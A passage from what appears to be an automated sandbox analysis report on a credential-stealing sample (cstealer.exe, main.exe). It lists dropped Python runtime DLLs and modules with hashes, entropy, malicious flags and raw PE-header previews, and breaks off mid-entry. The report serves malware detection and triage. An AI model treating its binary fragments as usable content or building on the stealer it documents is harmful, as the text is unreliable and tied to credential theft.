                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\sqlite3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI53642\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32454900
                                                                                                                                                          Entropy (8bit):7.999519647449114
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:786432:BvIFRVH8nRHay5SgGG4H55ABnWgSGiCzJjlknEs:BvEr+R6oGrHoBn02js
                                                                                                                                                          MD5:A1DDA0E77B597A95DC0D894A4D28780A
                                                                                                                                                          SHA1:20FEFD14AC0DBAB9809975F23A3F389FFF4CE043
                                                                                                                                                          SHA-256:3D8C76600AF69B316FB85D9834177B30070585B435D034516170F974FFB500B3
                                                                                                                                                          SHA-512:B46ACC9D48A1A2A0F914FCDD37ADDD829E3EEFC1E2035D22B418484D0025BDCEE27613415F08E8EA0B953D164D883146CD24E220D3741162A3B5605DD7A99400
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48000
                                                                                                                                                          Entropy (8bit):7.804339649997861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ZwAGUM8GBetg87It88blNUL6yfsFtHrrhhto+MQw5aZ/hLYpUHIDtVzR3YiSyvLk:OAG/k9MjCDErhhmQXfTHIDtVzV7SyD85
                                                                                                                                                          MD5:0C13627F114F346604B0E8CBC03BAF29
                                                                                                                                                          SHA1:BF77611D924DF2C80AABCC3F70520D78408587A2
                                                                                                                                                          SHA-256:DF1E666B55AAE6EDE59EF672D173BD0D64EF3E824A64918E081082B8626A5861
                                                                                                                                                          SHA-512:C97FA0F0988581EAE5194BD6111C1D9C0E5B1411BAB47DF5AA7C39AAD69BFBECA383514D6AAA45439BB46EACF6552D7B7ED08876B5E6864C8507EAA0A72D4334
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!............Pd....................................................`.............................................H.................... .. ..................................................Pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):107384
                                                                                                                                                          Entropy (8bit):7.936833941258681
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:YzsRxWJXVyOgbHffu+MLtWH/WSWXb01KQiID5q1CAt6xN:PU/gbHfW6WSWLplCuG
                                                                                                                                                          MD5:7BA541DEFE3739A888BE466C999C9787
                                                                                                                                                          SHA1:AD0A4DF9523EEEAFC1E67B0E4E3D7A6CF9C4DFAC
                                                                                                                                                          SHA-256:F90EFA10D90D940CDE48AAFE02C13A0FC0A1F0BE7F3714856B7A1435F5DECF29
                                                                                                                                                          SHA-512:9194A527A17A505D049161935432FA25BA154E1AEE6306DEE9054071F249C891F0CA7839DE3A21D09B57FDC3F29EE7C4F08237B0DFFFAFA8F0078CFE464BED3B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.p.......... ........................................0............`..........................................,..P....)....... ..........H'...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......h..................@....rsrc........ .......l..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):34688
                                                                                                                                                          Entropy (8bit):7.676872991541861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:UA1cXZ83zNDKJ/KDQI5zbp61ypRcTID5IubYiSyvaPxWEw:UwnzKUQ+p6mcTID5Iub7SyiPx
                                                                                                                                                          MD5:596DF8ADA4B8BC4AE2C2E5BBB41A6C2E
                                                                                                                                                          SHA1:E814C2E2E874961A18D420C49D34B03C2B87D068
                                                                                                                                                          SHA-256:54348CFBF95FD818D74014C16343D9134282D2CF238329EEC2CDA1E2591565EC
                                                                                                                                                          SHA-512:E16AAD5230E4AF7437B19C3DB373B1A0A0A84576B608B34430CCED04FFC652C6FB5D8A1FE1D49AC623D8AE94C8735800C6B0A12C531DCDD012B05B5FD61DFF2E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.P..........@ .......................................@............`..........................................;..P....9.......0..........,............;......................................@,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):86400
                                                                                                                                                          Entropy (8bit):7.925569108441777
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:nomFQO4KV4FqKFztYJgYFlXeppHFEtnp8bacIUmDIDe1Ye7SyOePx:IO4KV0qKTYhFlupdQ8WLvIDe1Yehx
                                                                                                                                                          MD5:8D9E1BB65A192C8446155A723C23D4C5
                                                                                                                                                          SHA1:EA02B1BF175B7EF89BA092720B3DAA0C11BEF0F0
                                                                                                                                                          SHA-256:1549FE64B710818950AA9BF45D43FE278CE59F3B87B3497D2106FF793EFA6CF7
                                                                                                                                                          SHA-512:4D67306FE8334F772FE9D463CB4F874A8B56D1A4AD3825CFF53CAE4E22FA3E1ADBA982F4EA24785312B73D84A52D224DFB4577C1132613AA3AE050A990E4ABDF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42872
                                                                                                                                                          Entropy (8bit):7.71252337640455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:eQ8MABQICeXD2rh0LklHwh20hpJ72IDQwzFDYiSyvGPxWERfsxi:eTieXEhow072IDQwzFD7Sy+Px3sxi
                                                                                                                                                          MD5:4351D7086E5221398B5B78906F4E84AC
                                                                                                                                                          SHA1:BA515A14EC1B076A6A3EAB900DF57F4F37BE104D
                                                                                                                                                          SHA-256:A0FA25EEF91825797F01754B7D7CF5106E355CF21322E926632F90AF01280ABE
                                                                                                                                                          SHA-512:A1BCF51E797CCAE58A0B4CFE83546E5E11F8FC011CA3568578C42E20BD7A367A5E1FA4237FB57AA84936EEC635337E457A61A2A4D6ECA3E90E6DDE18AE808025
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1189728
                                                                                                                                                          Entropy (8bit):7.945107908450931
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
                                                                                                                                                          MD5:DAA2EED9DCEAFAEF826557FF8A754204
                                                                                                                                                          SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
                                                                                                                                                          SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
                                                                                                                                                          SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1701240
                                                                                                                                                          Entropy (8bit):7.993696827956843
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:49152:A0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:vziPwCvZalhXOMIzQd
                                                                                                                                                          MD5:BB46B85029B543B70276AD8E4C238799
                                                                                                                                                          SHA1:123BDCD9EEBCAC1EC0FD2764A37E5E5476BB0C1C
                                                                                                                                                          SHA-256:72C24E1DB1BA4DF791720A93CA9502D77C3738EEBF8B9092A5D82AA8D80121D0
                                                                                                                                                          SHA-512:5E993617509C1CF434938D6A467EB0494E04580AD242535A04937F7C174D429DA70A6E71792FC3DE69E103FFC5D9DE51D29001A4DF528CFFFEFDAA2CEF4EAF31
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!..........D...]...D...................................^...........`.........................................H.].......].......].......V../...........r^.....................................(.].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24960
                                                                                                                                                          Entropy (8bit):7.407412042104121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oJUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:eJjW1J2pJjNID7GuIYiSyvCPxWEC
                                                                                                                                                          MD5:ABF7864DB4445BBBD491C8CFF0410AE0
                                                                                                                                                          SHA1:4B0F3C5C7BF06C81A2C2C5693D37EF49F642A9B7
                                                                                                                                                          SHA-256:DDEADE367BC15EA09D42B2733D88F092DA5E880362EABE98D574BC91E03DE30E
                                                                                                                                                          SHA-512:8F55084EE137416E9D61FE7DE19E4CFF25A4B752494E9B1D6F14089448EF93E15CD820F9457C6CE9268781BD08E3DF41C5284801F03742BC5C40B3B81FB798C5
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):300920
                                                                                                                                                          Entropy (8bit):7.985723274612961
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:Z2Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:Z2/e6inLOoyVJ/LHQdgipxsMY
                                                                                                                                                          MD5:BB3FCA6F17C9510B6FB42101FE802E3C
                                                                                                                                                          SHA1:CB576F3DBB95DC5420D740FD6D7109EF2DA8A99D
                                                                                                                                                          SHA-256:5E2F1BBFE3743A81B00717011094798929A764F64037BEDB7EA3D2ED6548EB87
                                                                                                                                                          SHA-512:05171C867A5D373D4F6420136B6AC29FA846A85B30085F9D7FABCBB4D902AFEE00716DD52010ED90E97C18E6CB4E915F13F31A15B2D8507E3A6CFA80E513B6A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.`.......@.. ....P................................................`.............................................X....................P...................................................... ...@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123768
                                                                                                                                                          Entropy (8bit):6.017133084000375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                          MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                          SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                          SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                          SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):251768
                                                                                                                                                          Entropy (8bit):6.543870948107038
                                                                                                                                                          Encrypted:false
